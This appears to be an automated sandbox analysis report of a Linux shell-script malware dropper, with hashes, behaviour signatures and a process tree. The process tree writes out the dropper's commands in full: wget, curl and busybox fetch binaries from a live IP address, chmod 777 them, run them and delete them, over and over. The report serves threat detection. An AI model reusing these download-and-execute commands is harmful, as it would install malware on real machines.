Analysis
-
max time kernel
19s -
max time network
133s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1517 chmod 1523 chmod 1607 chmod 1619 chmod 1565 chmod 1595 chmod 1643 chmod 1679 chmod 1535 chmod 1547 chmod 1559 chmod 1589 chmod 1637 chmod 1649 chmod 1529 chmod 1571 chmod 1583 chmod 1613 chmod 1655 chmod 1667 chmod 1577 chmod 1601 chmod 1553 chmod 1625 chmod 1661 chmod 1673 chmod 1541 chmod 1631 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 1518 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 1524 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 1530 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 1536 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 1542 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 1548 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 1554 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 1560 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 1566 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 1572 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 1578 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 1584 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 1590 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 1596 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 1602 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 1608 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 1614 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 1620 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 1626 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 1632 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 1638 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 1644 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 1650 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 1656 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 1662 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 1668 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 1674 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 1680 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl
Processes
-
/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh1⤵PID:1508
-
/bin/rm/bin/rm bins.sh2⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:1516
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:1518
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:1519
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:1520
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:1522
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:1528
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:1534
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:1540
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:1546
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:1552
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:1558
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:1564
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:1570
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:1576
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:1582
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:1588
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:1594
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:1600
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:1606
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:1612
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:1618
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:1624
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:1630
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:1636
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:1642
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Writes file to tmp directory
PID:1647
-
-
